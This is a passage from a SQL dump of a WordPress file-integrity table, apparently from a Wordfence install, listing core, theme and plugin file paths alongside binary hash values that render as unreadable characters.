n��̖Q��','wp-includes/css/dist/components/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0l1n���\\s>X>;T\n','�\'[sp\"A�w�^���K1b\n�-��mm��','',0,'?'),('M7JUP�_s�>[����','wp-content/themes/nirvana/images/socials/Twitter.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x`��P�/�S�%��','|_H|4z*WZ)r�A�6�&�^t��tƕ]X�','',0,'?'),('M=룃؋z2fG����','wp-content/themes/clean-magazine/css/clean-magazine-customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'SJ���-�LMw','�<a��-�y�t]�����\r��ru0��w��','',0,'?'),('M?,5�*�����K*�f','wp-admin/js/post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"|Ǔ9\\�­�s��','��Z��wrw��do}�c��5�?2/�ue�h�','',0,'?'),('MQ�B�f��i�\Z��','wp-content/themes/wen-business/assets/js/custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t��,lX��իe���','�}0�N����f��ֳ��P{�+7��I�V|�','',0,'?'),('MW�	���:��ي','wp-admin/images/align-none.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eqd2���u����\r','�g(�1�X�{� [].���T����A��','',0,'?'),('MY��G��\\tX����/','wp-includes/customize/class-wp-customize-color-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&��S?��|��G','h	�3|:Q9z���4Y1[�{^�	$;�#�q��','',0,'?'),('M]W-�G�i�	�)?�~N','wp-content/themes/wen-business/inc/customizer/layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�Ԑ�E�fD�%ux','mL���6��b����m���m8�U��','',0,'?'),('Mc\Z��FT�2����F','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/includes/fw-option-type-textarea-cell/views/view.php',0,'�\0�/ƗK>F�Q ��','�\0�/ƗK>F�Q ��','Q\"Cz��&��g�xb_3[�&���2p\0�o�M','',0,'?'),('M�̸/RRF?x��','wp-content/plugins/spam-captcha/lang/spam_captcha-fr_FR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���.JZ��4�f9u','���֨�֜\\\r遒y���>B9�P\n��yh�','',0,'?'),('M�t����(�;�|�','wp-content/themes/tortuga/inc/customizer/sections/customizer-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x��|���݊�/�����','i�{R��/�d76f��\"\".�<\\�tM�','',0,'?'),('M��:�j����6ֹ�W','wp-content/themes/illdy/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x;~@�JD�[p��f','x6�@�\n�qv�dR>��{�8^�_��pQ','',0,'?'),('MР\0�A���9Q�+��','wp-includes/js/admin-bar.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�၈��n�&�a1a\0','(L��<����K�i�-��U4�Wܸ` ��rl$�','',0,'?'),('M�`>W*���G�Ġ','wp-content/plugins/wordpress-seo/admin/recalculate/class-recalculate.php',0,'��J�\Z,zY�Z��G','��J�\Z,zY�Z��G',',�	����j5��v�yKGV\ne����uy','',0,'?'),('M�;C�����8Yyﲏ','wp-includes/js/twemoji.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���װ�aL/S��T','e�dimԺm\Z$V��v�%	���FO��aK\rŇS','',0,'?'),('M��T���]v�Yg','wp-content/themes/clean-magazine/inc/clean-magazine-featured-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���h�O�Yƶ���','$v��@���:�����?J=�c�}A�*k','',0,'?'),('M�ã�fJ��\'�C#H','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/includes/page-builder-section-item/static/js/scripts.js',0,'.y4�hQ�h��~�;�HX','.y4�hQ�h��~�;�HX','\\z���L�q*�E��Rw�J�r�D�n$װ�b','',0,'?'),('M��w�M�f�0�b\\�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�+>����*�A��ř�','����{��Z�>�1k||�}P���C�TC��A','',0,'?'),('M���I�M��rD��-','wp-includes/post-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�5����oh�\0>�','�������z|.D�%��Ǻ\01p؆Ke	�','',0,'?'),('M��B�?��<�v3��','wp-content/themes/accelerate/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���n����}{��9�s','<���n��ti�L��Ɛ��Q�>� �Q�_�','',0,'?'),('N/��k�}��\\|_�?','wp-content/themes/morfeu/assets/fonts/bootstrap/glyphicons-halflings-regular.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ዿa*.C��q�/N','�Iٖ��KJ\"�t�ϭ^�b_[#f�K�:O)g','',0,'?'),('N7�A�\0�nnV�֑�','wp-content/plugins/wordfence/images/checkbox.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��G\r�6|􈘀\'','��y~`w(j�~�=뤼&��ݴ���Q>`^�x','',0,'?'),('N;���5��Gj��O','wp-content/themes/fluida/sidebar-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.���(V+��\'�h�','i����Ty�=qt,K���l������6e}','',0,'?'),('N=�f�>$K���H�T�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����?�G{�����g','ĀР<W�;-\Z񀍙��(C+�,M���U��W6','',0,'?'),('NC�-����#�','wp-content/themes/relia/single-team_member.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��ts���l��','��������.�������$�X(���hҌ�{','',0,'?'),('NG�a:�Uf�Keu��I','wp-content/themes/sg-window/inc/css/customize.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�{6���f*2�<~�-s','�V_�0�U�Ts�ʫ�UT�Nn\r��9����','',0,'?'),('NR�ƨ<��#�t�X','wp-content/themes/vega/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q1Vkq�c:�����S�','_P^�Q�3����΍W\Z˿k�G+�iw��ާ\Z','',0,'?'),('Ni�~	�`���W�E','wp-content/plugins/wordfence/lib/wfAlerts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�(A��|�ϯy��L','�\'_�;?�|US5d}K/+,I!|��t','',0,'?'),('Nxa�߭�̿��(r�_','wp-content/plugins/all-in-one-wp-security-and-firewall/backups/index.html',0,'��ُ\0��	��B~','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('N|�0,�jCL\'�LP�','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_carousel.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�4�b��X����O��','��=�]��E�6B�5�ϛ^���','',0,'?'),('N|�‡Jв�zn�sw','wp-includes/pluggable-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@���\"�j��2�ߖ','��U����=����co��=t1�-\\�\r�=','',0,'?'),('N���W[��@��t)�','wp-content/plugins/wordfence/css/iptraf.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�bf.��\n�V[�xPh','J��-@ ]�-��	�cq���WQ$8�','',0,'?'),('N���/V�\r\'�҈+��','wp-content/themes/mh-magazine-lite/languages/sv_SE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n]�)�nh�jy@��','+�O征[V��v4���%˘C[N{�Z1��\"�\r^','',0,'?'),('N��=��i��[��a','wp-content/themes/barletta/css/dev/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SC�\Z(ze� �v��a�','���z���B�h@\ZR�`+�)A� ��>��','',0,'?'),('N�3�j@pu5����^��','wp-includes/js/tinymce/skins/wordpress/images/more.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\n�\nm\0;�˫�z','$��v��o^���U� �A\0���:�\\C�u��','',0,'?'),('N��`�	B�.i��k�\Z�','wp-content/themes/aqueduct/fonts/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#՝r{Q6�E��','dGS�-)��ȍ�]�1����&��s��Й^3','',0,'?'),('N�E\\���|���J�S�','wp-content/plugins/wordpress-seo/vendor/composer/autoload_real.php',0,'vr:3�؂��W%�YO�','vr:3�؂��W%�YO�','.��b�)�w�+N�\r�9��K�)?�g<�VfIE','',0,'?'),('N�.�_s�M_0}߹�E3','wp-content/plugins/unyson/framework/views/backend-container-design-taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r��.��8)x�}s','e��^�t�<�\\�?����ݫ���5`[c�\n5�','',0,'?'),('N�J_\'5�04!5�0','wp-content/plugins/unyson/framework/extensions/blog/manifest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<V�J����+','zw����at��.%���a�0�+i *�ix%��','',0,'?'),('N��P�i�����	C~','wp-content/themes/illdy/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)��w��U\\vq��A','׺���#v�%a}G@N-�,�I�b���I','',0,'?'),('N��HV����}�4G','wp-admin/css/customize-widgets-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iO���q�ff��\n�~','�F�%ɸ\n@���dzËE��|��B.=������','',0,'?'),('N��a��⿙e]�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/columns/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3de{�h��|@��ձ','��BX����V�AӋ6�4���/Mk��f�','',0,'?'),('O	�ю�Mf$�y��P�\Z','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.sq.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K�9�G\r��(Z7','LV�~���(7��9�랟���sʍ�V���','',0,'?'),('O	��S����#�Yi�v','wp-admin/includes/class-wp-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|�����q��C���i','� {�;�ּѢu�h�N����rB@v�Ng�m�jx�','',0,'?'),('Oqv��wT�gg8H��','wp-content/themes/verbosa/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2����b-�H��V�l','�����w~��1[����#\rP���^~�C','',0,'?'),('O�ҽPT�^�4~��B','wp-includes/css/dist/editor/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','45d,S��@�G��(','~T��~R������C^�V��\"U˅��Z�','',0,'?'),('O\Z��#�\n���~��v۽','wp-content/themes/supernews/assets/img/no-image-660-365.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O83gb�ЫR�\0��','x��Y�$6:D*u&����� �s��m�y$P=�','',0,'?'),('O =(�:��<�	�1F�','wp-includes/class-wp-feed-cache-transient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x��?^>��O�',':��;h�!xE�z��P+�dV�0����D�','',0,'?'),('O+���[�IB���m�m\'','wp-content/plugins/wordfence/images/wf-central-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�(��VѤ���','\0{\r�ߘ�J/� �^�+��,��S������','',0,'?'),('O4�dzWQ�\0��R��','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey.asc',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>Lj���\"C�ix���','��x眪!����}�\Z�����W����d','',0,'?'),('O5���\n)Z���W��','wp-content/themes/barletta/fonts/glyphicons-halflings-regular.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{�W]c\'\rd�`','����$�6�`�|��y+�^	8c%���k�','',0,'?'),('O:�3?��g�:��','wp-content/themes/sg-window/genericons/genericons/Genericons.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','→��(��7k�j','ɞ����1��X��*��*��y��h���s','',0,'?'),('O=��h�\0}O��rL�b','wp-content/plugins/wordfence/vendor/composer/ca-bundle/src/CaBundle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�U��~�L5�@\ZVU','/�r��T�rm����G�с�\r�%�e\r��|�[','',0,'?'),('OHۓ��^Z]\0��D','wp-content/plugins/unyson/framework/static/libs/typcn/css/typcn.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\��A�/[�8�7�/p',']�ڪ�Le�����=�cV�b1�g�YۄW�','',0,'?'),('OS�Y�Wz!8�ʣj�','wp-content/plugins/wordfence/views/gdpr/banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\atn}#��\r��׈','ÝE��F�@kh��V�b��w6��~�#kC','',0,'?'),('OT���;�h�FR|�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-maintenance-menu.php',0,'��e3O\\�a�R�RFQ','��e3O\\�a�R�RFQ','�59��[��>�}� �k?Nװ�oO�ٓ��E','',0,'?'),('O]c:��;U�ɯf','wp-content/themes/nirvana/images/columns/nirvana-column5.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f��l*h����ɠHm','@�j{C��&E���BF�Ϭ ��y�k�','',0,'?'),('OlqCcێ���������','wp-admin/css/forms-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[~��f�}=\Z��h��','����&�n�ǣ�`��ewg�t��2����β�O�','',0,'?'),('Oy�}Ma���_��I','wp-includes/Requests/Exception/HTTP/504.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�̪Db� ��*�','�<����!B�|$k���݈�# �e�i%0','',0,'?'),('O~r��&�Ur��&ۓ>','wp-content/themes/hueman/assets/front/js/lib/outline.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ؿV��\rZ���ɗ','�h��X�?^r9r���va��e8e�1�s�fq','',0,'?'),('O�潼m$��݋&_','wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^�F��\n�D��ҭ�','2\"�ޡ�4e���Kӗ�p!w#�����1���,','',0,'?'),('O��\\���P5��{�R�','wp-admin/plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U�W�)C�u�\0�\\','��gV���kr_\n\r�!�Z�8z<�GcQ���','',0,'?'),('O�N�N�����7ҕ)','wp-content/themes/illdy/layout/js/count-to/count-to.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�Lp�v�W���','0b�\Zk����	in�~kJ��b�9����l��','',0,'?'),('O�[0{�ë ��/�¼','wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')e��f�#�`P�~7�n','-m��z��n�N�F�E\0ѭ\\vq�sL?�Z\Z��','',0,'?'),('O����h�ܹ��-\nY%�','wp-content/themes/point/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�`����\Z��;','���`�)��;_��W������Q{��\ry','',0,'?'),('O�������a�+���','wp-content/plugins/wordpress-seo/admin/views/tool-import-export.php',0,'$������sث�2�n','$������sث�2�n',' 7䌊/E�Jt��<�u��IR-KbM���՗�߱','',0,'?'),('O����&�r�蓏�� ','wp-admin/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9Ly��<ܡ{‹���J�','�H��/(������X��[�Tp<���Ui�X�','',0,'?'),('O�^w�T�?��쭰[�','wp-content/themes/fabulous-fluid/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_n�>��/��8z�','B�*+��̝	�*��8H�/|\':g����v�','',0,'?'),('O����R�r����D�?�','wp-admin/js/postbox.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>�~O�������_L','�����^~���7�����r���\'�=�0�e','',0,'?'),('O� �#I\\����!{@\\','wp-content/themes/wen-business/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;翗s�{(R�[hW','�D�0���X�]_�7	��f�6���O��;','',0,'?'),('O��\'Z����?)���','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.sw.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f\Z�q)�5}4�Q�;','\\������7�r��}FT	�2��qg��','',0,'?'),('O���y/7��s.-�֤','wp-content/themes/panoramic/library/template-parts/top-bar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^T���g�^=ost1�','�+U$�?@�Ogk쫸���=�_\'�\'���[','',0,'?'),('O���j� �=�_�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/divider/static.php',0,'�]�t�.��.7t��','�]�t�.��.7t��','�u��H;&�W ��D��������_�','',0,'?'),('O�1j\"b|Iތڗ<�k','wp-content/themes/skt-construction-lite/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bj�4~�\r�B|���','mB7\rl|��	�������4��[=��S�','',0,'?'),('O�\\�_�Y������','wp-content/plugins/unyson/framework/static/img/logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E�ٕ6b\'\\�ģ�T','� �Κ��h�hB�[�MP����>T�˜�','',0,'?'),('O����y ��k	b�','wp-admin/css/customize-nav-menus-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�y�c�]9!T7N�[GE','�/�r���dO��L��hP?�=%m��x���','',0,'?'),('O���b��*�a���','wp-content/themes/supernews/assets/img/no-image-500-280.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D���ob�v�\r\"�=\Z�','<p7������c���FI��J�8�}_','',0,'?'),('O�v���z����I','wp-content/themes/hueman/assets/front/fonts/titillium-semibold-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-���AF�ࣄ�!�\Z{','�F�g)�f\'�1��e\0�\0H\0O�3�Rv2���','',0,'?'),('O�����HI!K!0[�','wp-content/plugins/wordfence/lib/menu_scanner_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�����D�X�;�I','���C�&YB�p_d$�,+������Ŝ���J��','',0,'?'),('O�5e���;hz�w@�W','wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Metadata.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z<����{~G�f(','��,ב[\Z���@�+���?x���P��А�','',0,'?'),('O��O�M_K7�n��','wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*5���^gG�o<NN','5�\'4ϣ�j3Ò�NjX�CU�!�����]~','',0,'?'),('O�hu�G���&\0�L�','wp-includes/Text/Diff/Engine/native.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S���\r��$�T','S��\04�v@�ű`�DG V�u�e�R��B竇3�','',0,'?'),('O���7�9Vo!�n�J�','wp-content/themes/verbosa/admin/images/magazine-2col.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�e�x���eT�o�w','���`1�rNS\0���h�7�����9+V','',0,'?'),('P��H��Z`�=���','wp-includes/blocks/pullquote/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�<��\r�<���\'�','�~u��W��S ����G�L����Z�`�p_�','',0,'?'),('P�bw�=����i��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\\Z��Iw5AlLۢ�','��K{�8��fl��7s�Rh���嗋��I','',0,'?'),('Ps�m\r-�t\"�%','wp-content/themes/twentyseventeen/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&g�h[[�ИNƍ�','�^\'��T�\"##\\L+&]Ү��v��h��Eo��v','',0,'?'),('P�/:��̮�҉���H','wp-content/plugins/wordfence/waf/pomo/streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�З:4�z��M�E�7�','�!8�s���w�#�)��\r�<�r|2y*LS^','',0,'?'),('PE۫�7r|oI�6��>','wp-includes/js/backbone.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`ft7\\J�*��4a','j�˯�}j�$��@�č��� n%Q|�l��','',0,'?'),('P ���NtD�݌�n\"�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a��!�,��^�q�','X߇p�Ք�Z��Љ�ֱo�\r�=˸<!�~�3�','',0,'?'),('P&_#�\'�zT���s','wp-includes/Requests/Exception/HTTP/417.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bpj�hO^�c\\G #','���L�T��Ҙ$xDs�^�h_!kC�\"1\'��_�','',0,'?'),('P\'�(���?+�z��$�','wp-admin/js/postbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/o���A-7i�{��\\�','�UN��%d��#H͵�3��m�=	�؞�','',0,'?'),('P+\r�T�n��d���/ͧ','wp-content/themes/nirvana/fonts/Oswald-Light-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���^ȣ�M�a���','�������A��jVǪJ\\4\"$��Xq��Kt\\	\\','',0,'?'),('P-&l��Z4�1?o�2','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/mixins/_text-emphasis.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E�C/���UffƓP�','-3�vL�5C��c\'[* Y����拨>�����\0','',0,'?'),('P1-1�jP4��ﶪ2�_','wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/download/type/piecemeal/server/config.php',0,'m�+�9:��	C���$��','m�+�9:��	C���$��','��3j��	O(r���oKb�}D���s�0�','',0,'?'),('P3�:��.�^i�+','wp-content/themes/fabulous-fluid/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SC�\Z(ze� �v��a�','���z���B�h@\ZR�`+�)A� ��>��','',0,'?'),('P73o�	��\0�=��','wp-admin/js/word-count.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\rffB)��������','��6j�,A�ުǭs�D��eC�z�&���\n���','',0,'?'),('P:�#ʁw���gA-','wp-content/themes/mh-magazine-lite/includes/widgets/mh-posts-stacked.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �4f��=/�e���','�L���Y�臞�Pe���Ex�s�kN�/Bc','',0,'?'),('PJ�~]��; ��`y','wp-includes/widgets/class-wp-widget-media-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dCa�*C^e~OriA�','�L�/�T|����w�pEf1�Ln��!y���','',0,'?'),('PK��2�I��)��','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_static.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3[�h�k�da4�p','�&�!�7^�@��9���N�BT�����*8�','',0,'?'),('PO�ww��H��x7���','wp-content/plugins/wordpress-seo/frontend/class-json-ld.php',0,'ٿ9���D6-�v��','ٿ9���D6-�v��',' c}�������_B7�@T���5x0��;M���','',0,'?'),('PQ�-0����,i0�/�','wp-content/themes/nirvana/images/columns/cake2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!3�T��e9:�j�M','	\\�gu�;�<��q�߰�5�Y$\Z,���l','',0,'?'),('Pc�/���f����^�','wp-content/themes/verbosa/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M~a�}(AUv[�װ��','Z۩��\r]f#7������e���4�@Ģ�','',0,'?'),('Pj㕡!���LF��N!4','wp-content/themes/skt-construction-lite/images/about3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���T�Ȱ� 3����','J�C(���)Z�gf����~�:��#����ޅ','',0,'?'),('P��[�D�XP��a���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Subdivision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;u‰�S���l','�M>:\r�&�V��`�\Z:�O0�Sv;\0��V�w','',0,'?'),('P��iz�t�a�}�a','wp-admin/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A4\\�=�','̕����e؉%�\n��ZE���&}���� n','',0,'?'),('P��\n�e���u�\"�','wp-includes/sodium_compat/lib/php72compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AG�\Zˢ;�������l','�D^�Y���\n�����%P+�0��[�x�~��','',0,'?'),('Pè�&R�{(6�M�]8','wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/dashboard.php',0,'NK��2� 4��L�U.','NK��2� 4��L�U.','��N��\n�d{���p�����h6e�C�Ge�g','',0,'?'),('P�@���;b<\n�c�','wp-includes/class-wp-oembed-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\";�r��\Z(FAU','�p���[����j$8�7�zI\\�!y�<G�4\r���','',0,'?'),('P�M�\Z�I̸�ݭY`r','wp-content/plugins/wordfence/lib/wfHelperString.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Euƻ\\S w?,�_�L`','��� ��i�Lƛw���6�_���,n�2S��Zh)','',0,'?'),('P�\n�;4��\rJ�����','wp-content/plugins/unyson/framework/includes/option-types/init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���C.��?�|x','����8�&�h,�L0U�tk��9�R��X_M�0;�','',0,'?'),('P�L?R^�#|$�=�T/','wp-content/plugins/unyson/framework/static/css/selectize.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hF&�J{�y� ','X���r�����`��b��j�?zUI}','',0,'?'),('P�p�4!Iai���','wp-content/themes/twentyseventeen/assets/css/ie8.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/�eC�Qk�u�Cwv�','�q�A����VI�B₏��.;\0�s`jM�','',0,'?'),('P�1$���\\*�C','wp-admin/images/stars-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A���#�S�Me.^','[��耿�_(\rh���Y���T��qZ��','',0,'?'),('P���Ӗ@!ԝŝ�2','wp-content/themes/panoramic/customizer/customizer-library/extensions/utilities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��>��gY��K��}W','|p9�X���(z�W�yM.v�%��k�����','',0,'?'),('P��0��a��R�z= ','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3�gkeͿݾ���|�h','�H��zj鞨%�����p=�Z��iNA�Z�','',0,'?'),('P�(����A}X��','wp-content/plugins/spam-captcha/font-3.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\Z���T��¨�\n�','��Y,�\Z�r�yn��<���:�}�����|vff��','',0,'?'),('P�t�X�ʧ8-K�B�{','wp-content/themes/skt-construction-lite/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O�D���/�P��','�\\Vb�:�_�)P���gI�����\Z\Z�dL�c','',0,'?'),('P귃qz�J.5����','wp-content/plugins/wordpress-seo/vendor/yoast/license-manager/views/form.php',0,'�	����iO2�t��h','�	����iO2�t��h','���L���}���OA���o��^T��!O�]','',0,'?'),('P�_�-�5�q��;�','wp-content/themes/mh-magazine-lite/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r<>E��qceih���','��o�u@%�l�&����w\Z�?3+���4��','',0,'?'),('Q�;���$��,Є�','wp-content/themes/wen-business/third-party/font-awesome/fonts/FontAwesome.otf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�C�rXgo����}*b>','�~�-��p�4���\r�����QE�=~�9�','',0,'?'),('Q�2)/>;��~���','wp-content/themes/nirvana/content/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����	5Uu�-2J�r','\Z�G�	���:;E���A�J9��.�}u�','',0,'?'),('Q\n`G�u檖�\r3z>�o','wp-content/plugins/spam-captcha/core/translation.inc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nf�lm��q�S_��','�1�M+�\'7����o�kn���0�Aa�}���','',0,'?'),('Q�ƥ�ɡ`��:�49','wp-content/themes/precious-lite/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k{�ï\"I��\n���','�o�\0Cj���\ZM�;2�D���\r�2	����','',0,'?'),('Q�zC4�Kir��~_','wp-content/themes/vega/color-schemes/blue.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hH/�o:��